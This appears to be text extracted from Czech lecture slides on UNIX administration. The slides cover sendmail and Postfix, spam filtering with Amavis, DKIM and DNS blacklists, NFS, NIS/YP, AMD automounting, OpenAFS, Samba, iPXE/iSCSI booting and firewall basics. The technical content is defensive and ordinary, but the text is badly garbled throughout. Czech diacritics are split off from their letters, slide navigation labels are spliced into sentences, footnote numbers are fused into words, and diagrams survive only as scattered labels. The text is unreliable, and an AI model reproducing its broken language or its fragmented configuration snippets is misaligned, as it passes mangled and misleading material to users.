LOCAL_CONFIG Kkoreatea regex -m text/html[; ]*charset="?(iso-2022-kr|euc-kr) LOCAL_RULESETS HContent-Type: $>Block_charset SBlock_charset R$* $: $(koreatea $1 $: $) R $@ OK R$+ $#error $: 599 Poslete mi to cesky

Administrace UNIXu

Správa sendmail-u


mailq(1) - obsah

front47

runq(1) - zpracování front48 mailstats(8) - statistika pˇrenosu˚ (per mailer) hoststat(8) - statistika transferu (per host)49 purgestat(8) - anulování statistik per host50 newaliases(1) - aktualizace báze aliasu˚ 51

47

sendmail sendmail 49 sendmail 50 sendmail 51 sendmail 48

-bp -q -bh -bH -bi


Cviˇcení

Praktická doporuˇcení


ˇ být volneˇ pˇrístupný bežným ˇ soubor s aliasy by nemel uživatelum ˚ ˇ pˇresmerujte poštu pro systémové uživatele (root, operator, www) na svuj ˚ úˇcet ˇ eˇ textové podoby báze aliasu˚ 52 po každé zmen spust’te newaliases(1) ˇ rte, že jste omylem nenakonfigurovali open-relay! oveˇ

52

Typicky /etc/aliases nebo /etc/mail/aliases

Cviˇcení

Postfix


1997 VMailer 1998 Secure Mailer (IBM)


1999 Postfix ˇ Obsahuje malé procesy s malou potˇrebou na oprávnení root-a. Základní konfigurace je v main.cf: mydomain – jméno lokální domény myorigin – na jakou doménu se maškaráduje lokálneˇ odesílaná pošta mydestination – pro jaké domény pˇrijímáme poštu relayhost – (opt) náš relay host Reload konfigurace: postfix reload – více viz postfix(1).

Cviˇcení

Administrace UNIXu

Postfix: Schéma konfigurace

Leo Galamboš E-mail Volba MTA Sendmail Postfix Boj proti SPAMu

From: [email protected] To: [email protected] mynetworks=clientzone relayhost=CD

@mff.cuni.cz MX 10 smtp1 MX 20 fake MX 30 smtp3

Cviˇcení mydestination=mff.cuni.cz

smtp3 clientzone

Internet

relaydept CD

mynetworks=relaydept myorigin=priklad.cz masquerade_domains=priklad.cz From: [email protected] To: [email protected]

mydestination=mff.cuni.cz smtp1

fake

relay_domains=mff.cuni.cz

Správa postfix-u


postfix(1) - start/stop/check/flush/reload/status postalias(1) - nahrazuje newaliases(1) postcat(1) - zobrazuje obsah front postconf(1) - správa main.cf postmap(1) - stavba/správa pomocných tabulek, napˇr. canonical, virtual postqueue(1) - tisk obsahu nebo vyvolání zpracování fronty

Boj proti SPAMu

Cviˇcení

ˇ Eliminace nechtené pošty


využívání filtrovacích serveru/služeb ˚ (spamassassin, spamd, clamd) filtrovací systémy (amavis) blokování seznamu˚ IP adres, odesílatelu, ˚ domén, státu puvodu ˚ podpora na FW (spamd + feed blokovaných z poštovního systému) ˇ rovacích modulu˚ (DKIM) nasazení oveˇ

Boj proti SPAMu

Cviˇcení

ˇ Filtrování nechtené pošty – Amavis


ˇ spustí se nekolik (puvodn ˚ eˇ virgin) démonu˚ každý z démonu˚ aplikuje filtry a modifikuje vstupní e-mail: ˇ zprávy (***** SPAM *****) modifikace pˇredmetu ˇ zmena adresáta (na virusalert@, spamalert@) odtržení viru, ˚ atp.

výsledek je poslán pˇres SMTP do druhé instance MTA dynamická adaptace: sdílený SPAM/HAM box (IMAP) monitorování cˇ innosti: mailgraph


Cviˇcení

Administrace UNIXu

Amavis diagram


smtpd :25

clamd


amavis :10023 smptd :10024

plain SMTP unauth TLS (destination) auth TLS (relay)

Cviˇcení

spamassassin

Přístup pouze z localhost smtpd :10025

ˇ rování pošty – OpenDKIM Oveˇ


ˇ démon opendkim na pozadí beží má k dispozici klíˇc k podpisu položek pˇri podpisu lze klíˇce volit dle domény zdroje prochází jím veškerá odchozí pošta (milter postfix-u)

ˇ amavisd pˇri pˇríjmu kontrolu muže ˚ provádet ˇ rí podpis dle veˇrejného klíˇce v DNS pˇríjemce oveˇ (TXT RR)

Cviˇcení

ˇ rování pošty – OpenDKIM Oveˇ

Administrace UNIXu Leo Galamboš E-mail

... Authentication-Results: my.egothor.org (amavisd-new); dkim=pass (1024-bit key) header.d=egothor.org ... DKIM-Filter: OpenDKIM Filter v2.10.3 my.egothor.org DFBEF2610A8 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=egothor.org; s=default; t=1446135505; [email protected]; bh=47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=; h=From:Subject:Date:From; b=oHN5neuUZ8aR4PUJVBvPOYYbLP15uQHagZdXW7IfSY7Avv0EL50C5jcyVU9iapuYW BYeQ4wzsRjkLdoCIDfgPHM63MtRKez4CpnZNZ4t5Ou7q8jMGbT0j3ciY2/hKNvS7cp J2SGKDT5VDnhw85UhnEse7fPgehbWlo70MewgrPM=

# dig default._domainkey.egothor.org IN TXT default._domainkey.egothor.org. 3600 IN TXT "v=DKIM1; k=rsa; t=y; p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCwE8RL2JZoo0eLjnFxzoL1/QrHe hKeg3ztMZK8Te1E6SrLvL1pf6tK71xjhvnn6xQ4sk89ExsL7X+LEUI6JW6lF2f6GM3 Pp49GXPOFFFy8xRtpNseWKkbXbRx5tucjx4RH9kzotHF7X2mC2QigfuDmS5lZ3h4AC o2s+IfUmmqW7QIDAQAB"


Cviˇcení

Backscatter


ˇ SPAMer použije adresu nevinné "obeti"jako odesílatele ˇ [email protected] ˇ naše obet’: cílové stroje bud’ odmítnou SPAM, anebo se SPAMer trefuje na neexistující pˇríjemce zaˇcne vznikat velké množství nedoruˇcenek ˇ pˇríjem zajišt’uje server se schránkou obeti ˇ pokud poštu pˇrijmeme, zahltíme schránku obeti

Boj proti SPAMu

Cviˇcení

Backscatter - ˇrešení 1

Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail

ˇ je neexistující emailová adresa. Obetí


Cviˇcení

Postfix v defaultní konfiguraci odmítá pˇríjem.

Poznámka: nemá smysl zamezovat samotným TCP spojením, nebot’ nepocházejí od SPAMera.



ˇ je existující emailová adresa. Obetí

Z analýzy hlaviˇckových údaju˚ v nedoruˇcence zjistíme, zda šel takový email skuteˇcneˇ od nás. Hledat mužeme ˚ jak položky Message-ID nebo i Received.

Cviˇcení



Kontrola hlaviˇckových údaju˚

Volba MTA Sendmail Postfix

header_checks = pcre:/etc/postfix/header_checks

Boj proti SPAMu

Cviˇcení

/^Received:.* +by +(egothor\.org)\b/ REJECT forged mail server name in Received: header: $1

Kontrola obsahu (viz odsazení v regex-u) body_checks = pcre:/etc/postfix/body_checks /^[> ]*Received:.* +by +(egothor\.org)\b/ REJECT forged mail server name in Received: header: $1

ˇ Blokování nechtené pošty

Administrace UNIXu Leo Galamboš E-mail Volba MTA Sendmail

MTA muže ˚ implementovat whitelisting – seznam nepovolených (Realtime Blackhole List) IP, které se blokují graylisting – seznam povolených IP, ostatní se jen doˇcasneˇ blokují (bulkmailery spameru˚ na tom ˇ vetšinou shoˇrí)

Problém Jak spravovat seznamy (ne)povolených?


Cviˇcení

DNS Black List


1

2

3

4

pˇríjímací MTA zjistí IP odesílajícího MTA, napˇr. 192.168.300.1 adresa se otoˇcí jako pˇri revers DNS, tj. 1.300.168.192 suffix se použije jméno DNSRBL, napˇr. 1.300.168.192.blacklist.ibm.com Áˇckový (A RR) dotaz do DNS ˇ “úspech” ⇒ IP je na seznamu chyba NXDOMAIN z DNS serveru ⇒ IP není v seznamu

5

ˇ (volitelné) TXT RR muže ˚ obsahovat vysvetlivku k danému záznamu

6

validní Áˇcka jsou dle úmluvy ve 127/8, konkrétní hodnoty mají i dohodnutý význam


Cviˇcení

Administrace UNIXu

Konfigurace DNSBL


$TTL 2d $ORIGIN blacklist.ibm.com @ IN SOA ns.ibm.com. hostmaster.ibm.com. ( 2006110101 ; serial number 3h ; refresh 15m ; retry 3w ; expiry 3h ; minimum ) IN NS ns.ibm.com. IN NS ns2.ibm.com. # dle dohody slouží následující Áˇ cko pro # externí testování 2.0.0.127 IN A 127.0.0.2 # black list 1.300.168.192 ...

IN IN

A TXT

127.0.0.2 "Spammer"


Cviˇcení

Návratové hodnoty sorbs.net


127.0.0.2 Open HTTP Proxy Server (http.dnsbl. . . )

Volba MTA

127.0.0.3 Open SOCKS Proxy Server (socks.dnsbl. . . )

Postfix

127.0.0.4 Open Proxy Server not listed in the SOCKS or HTTP lists (misc.dnsbl. . . ) 127.0.0.5 Open SMTP relay server (smtp.dnsbl. . . ) 127.0.0.6 Hosts sending spam/UCE/UBE to SORBS, netblocks of spam supporting service providers (spam.dnsbl. . . ) 127.0.0.7 Web servers email vulnerabilities (FormMail scripts, . . . ) (web.dnsbl. . . ) 127.0.0.8 Hosts demanding not to be tested by SORBS (block.dnsbl. . . ) 127.0.0.9 Networks hijacked from original owners (zombie.dnsbl. . . ) 127.0.0.10 Dynamic IP Address ranges (dul.dnsbl. . . ) 127.0.0.11 Domain names with bad A or MX RRs (badconf.rhsbl. . . ) 127.0.0.12 Domain names with no email originating (nomail.rhsbl. . . )

Sendmail

Boj proti SPAMu

Cviˇcení

MTA: Praxe


zablokování anonymní relay doménový koš TLS podpora zahazování SPAMu (analýza obsahu > regulární výrazy na hlaviˇcce emailu) eliminování backscatter emailu˚ (regulárními výrazy)

Cviˇcení

Vyzkoušejte si


nainstalujte postfix inicializujte MTA (postfix) 1 2 3

postfix-enable(x) sendmail_flags=-bd -q30m crontab(1): crontab -e (disable clientmqueue)

nakonfigurujte postfix /etc/postfix/* (hlavneˇ main.cf) quick hint: cd /etc/mail;cp aliases ..;newaliases

zkuste poslat e-mail root-ovi pˇres telnet(1) sledujte záznamy v /var/log/maillog


Cviˇcení

Vyzkoušejte si: telnet localhost 25


Cviˇcení

Vyzkoušejte si


zaved’te si MX pro vaši doménu nechte si poslat e-mail odjinud ˇ RELAY služby nebo si je navzájem si poskytnete ˇ sami na svém dalším VPC zajistete zaved’te další MX s prioritou 0 na neplatný/neživý stroj – sledujte prodlevy pˇri doruˇcování pošty

Cviˇcení

Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD

ˇ Cást V

Samba Shrnutí

NFS Nastavení

AMD, YP/NIS

RPC, NFS, AMD, Yellow Pages

Podrobnosti Vyzkoušejte si

Program


24

Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba

Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí

NFS Nastavení

AMD, YP/NIS Podrobnosti

25

NFS Nastavení

26

AMD, YP/NIS

27

Podrobnosti

28

Vyzkoušejte si

Vyzkoušejte si


Internet

IPSec

Štít


Road warrior

Shrnutí

NFS Nastavení

AMD, YP/NIS Podrobnosti Dohled

Vyzkoušejte si

Tisk

SMTP

Zálohování DNS

AMD

NIS/YP

NFS

Sít’ové prostˇredí

Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí

Požadavky jednotná báze uživatelu˚ (skupin, hesel. . . ) pˇrenositelnost prostˇredí mezi uzly (mapování disku. ˚ ..) robustnost, odolnost proti výpadkum ˚ celková bezpeˇcnost ˇrešení

NFS Nastavení

AMD, YP/NIS Podrobnosti Vyzkoušejte si

Sít’ové prostˇredí


Unix nabízí pˇredevším samostatné servery/služby rozdílný stupenˇ integrace

Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD

ˇ nekteré mají vlastní autorizaˇcní bázi53

Samba Shrnutí

ˇ služby54 problém s kvalitou jištení

NFS

rozdílná úrovenˇ bezpeˇcnosti55

AMD, YP/NIS

Nastavení

Podrobnosti

Centralizace autorizaˇcní báze skrze systémové vrstvy: PAM, YP, atp. knihovny/vrstvy: SASL (Courier) sít’ové služby: LDAP, MySQL, Kerberos, atp. ˇ SASL→PAM→LDAP smes: 53

Proto roste duležitost ˚ integrace všech bází do jediné. ˇ Nekteré služby nelze z principu jistit! 55 Celkovou bezpeˇcnost pak vymezuje nejslabší prvek! 54

Vyzkoušejte si

Linux PAM /etc/pam.d/system-auth


NFS Nastavení

auth auth auth auth auth

required sufficient requisite sufficient required

pam_env.so pam_unix.so nullok try_first_pass pam_succeed_if.so uid >= 500 quiet pam_ldap.so use_first_pass pam_deny.so


LDAP


NFS Nastavení


Existující ˇrešení


báze uživatelu: ˚ NIS/YP, Kerberos, Samba

NFS

mapování a sdílení disku: ˚ NFS3/4, OpenAFS, Samba. . .

AMD, YP/NIS

redudance: AMD, OpenAFS, Samba bezpeˇcnost: K4/5+AFS, Samba, dále AH/ESP

Nastavení


Techniky sdílení disku˚

Administrace UNIXu Leo Galamboš Motivace Sdílení disku

de-facto pˇrímé: SCSI/SATA over Ethernet, . . . vhodné pro pˇripojení oblastí diskového pole (clustery) jednoduché, cˇ isté, malá režie nutnost distribuovaného zámku a vhodného FS (GFS2) ˇ vetšinou zcela bez šifrování56

zprostˇredkované: NFS, SMB, AFS, . . . vhodné pro pˇripojení (existujících) oblastí z jiného stroje ˇ cˇ asto implikuje provoz složitejších modulu˚ (šifrování, transakce/zámky)

56

Spoje bývají vedené separátními okruhy-VLANy

Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí

NFS Nastavení


Techniky sdílení disku˚

Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba

de-facto pˇrímé: block-level pˇrístup speciální SCSI (dˇríve) – problém s délkou kabelu do ˇ jen malé clustery do 4 uzlu) 25m (možnost stavet ˚ SAN/iSCSI (dnes) – disky ve speciálním racku/místnosti

zprostˇredkované server poskytuje svazky klientum ˚ vše ˇreší pˇríslušný protokol

Shrnutí

NFS Nastavení


Block-level pˇrístup

Administrace UNIXu Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS

Multipath

NIS/YP, NFS, AMD Samba Shrnutí

zajišt’uje záložní kanály ˇ v discích za plného provozu možnost zmen ˇ "nadmerná podpora"v Linuxu - problém s pˇripojováním rozdílných RAID k jednomu serveru Linux zatím postrádá jednotnou podporu pro všechna multipath zaˇrízení a automatickou rekonfiguraci po pˇripojení vypadlé cesty/zaˇrízení (2.6/2.7?)

NFS Nastavení


Block-level pˇrístup: velké nebo malé LUNy


Zaˇrízení vždy nepodporují obrovské LUNy

NFS

Recovery i backup velkého LUNu zabere více cˇ asu

AMD, YP/NIS

ˇ variabilitu Malé poskytují vetší Malé implikují velký poˇcet LUNu˚ Linux/2.6/i386 4096, Linux/amd64 až 32768 LUNu˚

Nastavení


Block-level pˇrístup: domácí nasazení


v BIOSu povolen start ze síteˇ (PXE57 ) PXE je v dodávaných PC zastaralé, napˇr. neumí iSCSI PXE tedy jen zavede iPXE, které je mocné DHCP doruˇcí položky Next-server58 a Boot-file-name59

iPXE si umí stáhnout svoji konfiguraci z HTTP UNDIonly.kpxe je ‘make bin/undionly.kpxe EMBED=mydisk.ipxe‘ mydisk.ipxe je skript ‘dhcp ; chain http://192.168.400.2/${net0/mac}‘

iPXE umí napˇríklad start s iSCSI jako boot-diskem

57

Preboot execution environment TFTP server 59 Bootovací obraz - zde typicky iPXE UNDIonly.kpxe 58


NFS Nastavení


Block-level pˇrístup: domácí nasazení


Obsah ‘chain http://192.168.400.2/${net0/mac}‘


#!ipxe

NFS Nastavení

# Widle workaround set gateway 0.0.0.0 set net0/gateway 0.0.0.0 set keep-san 1 sanboot iscsi:192.168.400.3:::2:\ iqn.2014-07.org.egothor:red


Disková pole, fyzické sdílení


NFS Nastavení


fiber linky i v ˇrádu km, dnes ethernet 802.3ad zjednodušení zálohování a oprav (centralizace)

Dostupné distribuované FS


Starší: NFS, AFS (Arla), DFS Moderní Otevˇrené: Lustre, OpenGFS, klient IBM SAN FS Proprietární: SGI CXFS, IBM GPFS

Cílové parametry: desítky tisíc uzlu, ˚ PB dat, transfer stovek GB/s

NFS Nastavení


Varování! Local/last-close sémantika


A B

o

w o

w w

w

c

Samba Shrnutí

c

NFS Nastavení


Nebezpeˇcí pro serverové aplikace! Local: w(B)w(A) Last-close: w(B)w(B)

Kerberos, OpenAFS


uživatel se autorizuje proti K4/5 klog(?) získá tak lístek/token do “systému” tokens(?)


ˇ ruje platnost lístku˚ AFS si oveˇ

NFS

svazky jsou pˇrístupné na zvláštním mount-pointu

AMD, YP/NIS

Nastavení

Podrobnosti

ˇ (cells) AFS organizuje sít’ do bunek ˇ bunka nabízí diskové svazky (volume) replikuje a zálohuje svazky

rozšíˇrená ACL jsou volní klienti jak pro Unixy tak Windows

Vyzkoušejte si

ˇ OpenAFS - jméno vlastní bunky


Windows


NFS Nastavení


Unix /etc/openafs/ThisCell

ˇ OpenAFS - seznam bunek


Windows


NFS Nastavení


Unix /etc/openafs/CellServDB

OpenAFS - management


Windows


NFS Nastavení


Unix

NIS/YP, NFS, AMD


ˇ integrace do O/S, sdílení map (systémových silnejší bází) pˇripojení svazku mount.nfs(8) problematické udržování replik svazku˚ problémy s bezpeˇcností (ˇreší NIS+, NFS4) není volný klient pro NFS4 na Windows

NFS Nastavení


Samba


pˇredevším pro integraci UNIX stanic do Windows prostˇredí (a naopak) “nativní” implementace sdílení známého z OS2/Windows sdílení svazku˚ i tiskáren

NFS Nastavení


Ryze subjektivní hodnocení


Výhody


AFS bezpeˇcnost, redundance NFS výkon, jednoduchost ˇ SMB schopnost integrace se svetem Windows

NFS Nastavení


Nevýhody AFS komplexní správa NFS bezpeˇcnost, kvalitní redundance SMB bezpeˇcnost, kvalitní redundance

Network File system (verze 260 , 361 )


Verze 3 offsety 64b (ver2: 32b), filehandle až 64B (ver2: pevneˇ 32B) 56KB R/W UDP (ver2: 8KB) READDIRPLUS (filehandle+attr) eliminuje LOOKUP pˇri scan adresáˇre


NFS Nastavení


exclusive CREATE PATHCONF definuje maximální délky jmen souboru˚ a cest všechny chybové stavy definované specifikací nový NF3ERR_JUKEBOX (aka try later) ACCESS (test ACL pˇrímo na serveru) WRITE, COMMIT plneˇ async 60 61

RFC1094 RFC1813

Vyzkoušejte si

Nedostatky


bezpeˇcnost (NFS ver 4, šifrování spoje)


problémy s fragmentací pˇrenosu (nastavení menšího UDP R/W bloku než je MTU, TCP) sdílení UID, GID, ACL (NIS) chudé ACL stabilita mount-u (AMD – kopie svazku˚ na záložních uzlech) NFS3 je bezestavový (NFS4 je stavový) NFS4 snižuje poˇcet kontaktu˚ klient-server až 5x

NFS Nastavení


Kontrola – utility


nfsstat(1) -c/-s – statistika NFS klienta/serveru rpcinfo(1) -p – seznam server-procesu˚ napojených na RPC showmount(8) -a/-e – seznam pˇripojených/mount uzlu˚

NFS Nastavení


ˇ NFS – nekteré duležité ˚ parametry


-b:bg FAIL → zkoušej dál na pozadí

Kerberos, OpenAFS NIS/YP, NFS, AMD Samba

hard server spadl → BLOCK -s:soft server spadl → ohlas FAIL -t:timeo retry v 1/10sec -i:intr uživatel muže ˚ zrušit požadavek když cˇ eká na vypadlý server -2 NFS v2 -3 NFS v3 -T TCP -U UDP

Shrnutí

NFS Nastavení


NFS – procesy


portmap mapování mezi RPC prg-num a porty obslužných RPC procesu˚ mountd validuje mount požadavky klientu˚ s ohledem na exports(5) nfsd R/W od klientu˚ rquotad hlídá kvóty uživatelu˚ (fBSD)

NFS Nastavení


/etc/exports – zrady a nástrahy


ˇrádek specifikuje exportní info pro jeden souborový svazek na jeden host


jeden host muže ˚ být specifikován jen jednou pro daný svazek

NFS

ˇ HUP do mountd(8) reload zmen:

AMD, YP/NIS

Shrnutí

Nastavení

Podrobnosti

Chybneˇ # celý /usr je jeden svazek /usr/local klient1 /usr/ports klient1

Správneˇ /usr/local /usr/ports klient1

Vyzkoušejte si

ˇ Rešení nedostupnosti


zvýšení stability NFS serveru

Motivace Sdílení disku Kerberos, OpenAFS

zvýšení stability síteˇ automounter, který pˇripojuje/odpojuje svazky podle aktuální dostupnosti62


NFS Nastavení

AMD, YP/NIS

Plán pro cviˇcení Protože automounter cˇ te mapu s definicí souborových ˇ zdroju˚ a jejich umístení, je možné ho donutit cˇ íst “centrální mapu”. Centrální mapu mu doruˇcíme po síti a tím dostaneme box vhodný napˇríklad jako klientské PC pro menší laboratoˇr. Zárovenˇ s mapou svazku˚ mu mužeme ˚ doruˇcit i passwd (a další báze) a mít opravdový laboratorní box.

62

ˇ málo pozdeji ˇ Takový software uvidíme o neco


ˇ Rešení (ne)bezpeˇcnosti


ˇ jitter: Pˇrikrytí pomocí IPsec (bude pozdeji),

NFS Nastavení

0,10ms – pˇrímý spoj

AMD, YP/NIS

ˇ 0,30ms – pˇres smerovaˇ c


ˇ 0,70ms – pˇres smerovaˇ c skrze IPsec ˇ Smerovaˇ c lze eliminovat vhodným L2 prvkem.

Vyzkoušejte si – NFS server


1

portmap=YES

2

nfs_server=YES

3 4 5

lockd=YES nfsd_flags=-tun 20 /etc/exports(5): místo na svazku: /home pˇremapování práv: -maproot=0 omezení pˇripojení: -network ... -mask ...

6

reboot nebo start portmap, nfsd, mountd, rpc.lockd

7

kontrola: rpcinfo -p


NFS Nastavení


Vyzkoušejte si – NFS klient

Administrace UNIXu Leo Galamboš Motivace

Inicializace parametru˚ v /etc/sysctl.conf: vfs.nfs.iothreads=10

Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí

NFS Nastavení

Staˇcí obyˇcejný mount_nfs(8), který lze vložit i do /etc/fstab(5):


nfs.lg:/r/home /home nfs rw,nosuid,soft,intr 0 0

ˇ Mount defaultneˇ probehne na ver3, fallback na ver2 (lze vynutit parametry mount_nfs(8): -3, -2): mount_nfs -3 -b -s -i nfs.lg:/remote/home1 /home

Vyzkoušejte si

AMD, YP/NIS


NIS je Network Information System, který v rámci své domény63 poskytuje klientum ˚ mapy (soubory) s ˇ “nejakými” sdílenými daty


mapy lze promíchat s daty na klientovi (pro správné “míchání” napˇríklad /etc/passwd je nutná podpora v systému64 ) prakticky provedeme toto: 1

2

3

63 64

nastavíme náš NFS server jako master pro naši YP/NIS doménu se sdílenými informacemi (passwd, group, hosts, aliases. . . ) nastavíme kienta, kterému ze serveru poskytneme mapu pro automounter klient si pˇrimíchá passwd a další mapy, aby byl snadno vzdáleneˇ konfigurovatelný

neplést s DNS BSD ji mají, Linux s pˇrídavným software

NFS Nastavení


Slovníˇcek


NIS Network Information System YP Yellow Pages (poskytují se mapy/stránky), Yellow Pee (slangové oznaˇcení) doména stroje sdílející tutéž bázi NIS master stroj s bází (je práveˇ jeden) ˇ slave stroj s kopií báze (muže ˚ jich být nekolik) klient stroj, který využívá NIS bázi v rámci “své domény”

Samba Shrnutí

NFS Nastavení


Administrace UNIXu

Schéma

Leo Galamboš Motivace

YP doména mapy

Sdílení disku Kerberos, OpenAFS

Master


NFS

yppush

yppush

Nastavení

AMD, YP/NIS

ypbind


Slave

Slave

ypbind broadcastuje, pokud nemá seznam serveru˚ v /etc/yp/doména

Mapy OpenBSD


Mapa passwd group ethers netgroup networks hosts protocols services aliases rpc netid amd.home

Napojení +name:*:::::::: (master.passwd) +name:*:0:0::: (passwd) +name:*:: + +


NFS Nastavení


Vyzkoušejte si – nastavení NIS serveru˚


v /etc/rc.conf zapneme portmap a pro sdílení hesel nastavíme yppasswdd_flags=


echo "mynisdom">> /etc/defaultdomain inicializace master serveru: ypinit -m doména inicializace slave serveru: ˚ ypinit -s masterhost doména hot-fix65 : vytvoˇrte adresáˇr /var/yp/binding ˇ na straneˇ serveru musí bežet ypserv(8) a spol: bud’ restartujeme nebo spustíme portmap(8), ypserv(8), ypbind(8), rpc.yppasswdd(8) kontrola zaregistrovaných RPC procesu: ˚ rpcinfo -p

65

jinak OpenBSD rc-script nespustí YP procesy

Shrnutí

NFS Nastavení


Inicializace


NFS Nastavení


Vyzkoušejte si – nastavení NIS klienta


v /etc/rc.conf zapneme portmap


echo "mynisdom">> /etc/defaultdomain

NFS Nastavení

echo ’+:*::::::::’ >> /etc/master.passwd

AMD, YP/NIS

pwd_mkdb /etc/master.passwd

Vyzkoušejte si

echo ’+:*::’ >> /etc/group vytvoˇrte adresáˇr /var/yp/binding nebo spust’te ypbind(8) kontrola: ypcat -x, ypcat passwd

Podrobnosti

Vyzkoušejte si – Klient: AMD a export /home


v /etc/rc.conf.local zapneme amd=YES

Shrnutí

NFS

echo "/home amd.home"> /etc/amd/master kontrola: ypcat amd.home vrací mapu ze serveru ˇ nad /home jak staˇcí restartovat, amd(8) pobeží ˇ jsme chteli kontrola: amq(8) zkoumejte “specifikum” /home (jak je pˇripojeno?)

Nastavení


Portmap v OpenBSD


Portmap v OpenBSD je specifický a v souˇcasnosti snad jediný “opravený”:


BIND povel se sbírá pouze na speciálním 127.0.0.1:111

NFS

ostatní povely mohou jít pˇres *:111

AMD, YP/NIS

originální (chybná) implementace66 posílá a poslouchá BIND povel na *:111

Podrobnosti

ˇ ceho67 dusledek: ˚ porty cˇ i nativní binární emulace neˇ RPC-love z Linuxu nemusí fungovat, protože se BINDuje s IP adresou externího adaptéru a to OpenBSD nevezme

66 67

Sun Microsystems, Inc. Legato Networker’s nsrexecd

Shrnutí

Nastavení

Vyzkoušejte si

NFS nad UDP


NFS pracuje s bloky velikosti 8KB

Kerberos, OpenAFS NIS/YP, NFS, AMD Samba

ty jsou dolu, ˚ rozpadnou se na Ethernetové rámce 1,5KB

Shrnutí

NFS Nastavení

server je pošle a klient pˇrijímá

AMD, YP/NIS

ˇ když nejaký fragment nepˇrišel, posílá se znovu celý NFS blok

Podrobnosti

Problém Pokud klient nestíhá brát rámce, nepˇrijde de-facto nic. Pak je potˇreba snížit velikost NFS bloku odpovídajícími parametry na “správnou” velikost, napˇríklad 1024.

Vyzkoušejte si

AMD amd mapa má na ˇrádku klíˇc a pak libovolný poˇcet zdroju˚ zdroje se zkouší v poˇradí uvedeném na ˇrádku, než se najde “živý” zdroj zaˇcínající pomlˇckou specifikuje jen default položky pro následující zdroje default pro všechno se uvádí se speciálním klíˇcem /defaults, typicky na zaˇcátku mapy ˇ cka, která platí pro vše, co klíˇcem muže ˚ být i hvezdiˇ není implicitneˇ uvedeno jinde ˇ urˇcení zdroje muže ˚ využívat promenné, napˇríklad ${key} zdroje lze vázat i s podmínkou mountovat lze nejen nfs implementováno jako NFSD s real-mountem stranou a symlinky z odpovídajících uzlu˚ koˇrene další podrobnosti info amd


NFS Nastavení


Pˇríklad težší AMD mapy


/defaults type:=nfs;rhost:=obsdstronghold rfs:=/home/;sublink:=${key} NFS * secdir \ AMD, YP/NIS host!=homepc-lg;type:=nfs;\ Podrobnosti rhost:=obsdstronghold;rfs:=/disk00/mountA;\ Vyzkoušejte si sublink:=securedir secdir \ host==homepc-lg;type:=ufs;\ dev:=/dev/sd0h;sublink:=securedir Samba

Shrnutí

Nastavení

Administrace UNIXu

NIS+

Leo Galamboš Motivace Sdílení disku Kerberos, OpenAFS

ˇ implementace NIS novejší Secure RPC data encryption and authentication struktura domény není plochá, ale je to strom 6 objektu: ˚ directory entry group link table private


NFS Nastavení


Míchání lokální báze a mapy

Administrace UNIXu Leo Galamboš Motivace

v /etc/netgroup se nadefinují skupiny trojic (host,user,domain)

Sdílení disku Kerberos, OpenAFS NIS/YP, NFS, AMD Samba Shrnutí

prázdná složka trojice znamená ANY

NFS

struktura netgroup: skupina trojice1 trojice2 . . . trojiceN 68

AMD, YP/NIS

použití v /etc/master.passwd, pˇreklad z UID na uživatelské jméno pracuje, ale naloguje se jen “skupina”: +@skupina:::::::: +::::::::/sbin/nologin

68

ˇ limit 15 trojic ve skupineˇ SunOS mel

Nastavení


Vyzkoušejte si


NFS server na (20:22)

Shrnutí

NFS

ostatní stroje NFS klienti pro /usr/local, pˇríp. /home NFS server master-em v NIS vytvoˇrte NFS/NIS zálohu ˇ realizujte AMD s jištením NFS svazku sjednod’te všechny mapy pomocí YP, ponechte jen lokální administrátorské úˇcty

Nastavení


Administrace UNIXu Leo Galamboš Firewall ICMP, UDP, TCP

Implementace Pravidla

ˇ Cást VI

Realita života. . . Tabulky NAT RDR Synchronizace stavu˚

Firewall, NAT, RDR, CARP

CARP Správa

Vyzkoušejte si

Program


29

Firewall ICMP, UDP, TCP



30

Implementace Pravidla Realita života. . . Tabulky NAT RDR Synchronizace stavu˚

31

CARP Správa

32

Vyzkoušejte si


CARP Správa

Vyzkoušejte si

Administrace UNIXu

Úvod

Leo Galamboš Firewall ICMP, UDP, TCP

firewall (fw) filtruje packety na sít’ových adaptérech stavový firewall pravidla postihnou pouze inicializaci spoje zbytek ˇreší fw (podle stavu) – následný packet patˇrí k povolenému spoji UDP, ICMP nemají stav, ale žádost muže ˚ otevˇrít cˇ asové okno TCP spojení má stav

aplikaˇcní firewall – filtrování na úrovni aplikaˇcních protokolu˚ VoIP/SIP – voice data projdou bez nutnosti otvírat porty


CARP Správa

Vyzkoušejte si

Administrace UNIXu

Úvod



ˇ na smerovaˇ ci je možné pˇrepisovat IP adresy v packetech ˇ zdrojová adresa maskovaná smerovaˇ cem — NAT cílová adresa pˇrepsaná na jinou — RDR

HIPS (Host Intrusion Prevention Systems) – monitorování aplikací pf – OpenBSD; pf/ipfw – FreeBSD; iptables – Linux; FW-1 – Solaris; ipf/ipfilter


CARP Správa

Vyzkoušejte si

UDP


Implementace Pravidla Realita života. . . Tabulky NAT RDR

zdrojová a cílová IP adresa

Synchronizace stavu˚

CARP

zdrojový a cílový port délka a checksum

Správa

Vyzkoušejte si

TCP


Implementace


Pravidla Realita života. . . Tabulky

zdrojový a cílový port délka a checksum sequence, acknowledgement number – offset 1. bytu tohoto packetu vuˇ ˚ ci náhodné hodnoteˇ zvolené pˇri inicializaci spoje (32-bit hodnoty) pˇríznaky: SYN, ACK, URG, FIN, RST, PSH velikost okna: kolik dat ješteˇ bez problému˚ pˇrijmeme

NAT RDR Synchronizace stavu˚

CARP Správa

Vyzkoušejte si

Administrace UNIXu

ICMP

Leo Galamboš Firewall


ICMP, UDP, TCP


checksum

Realita života. . .

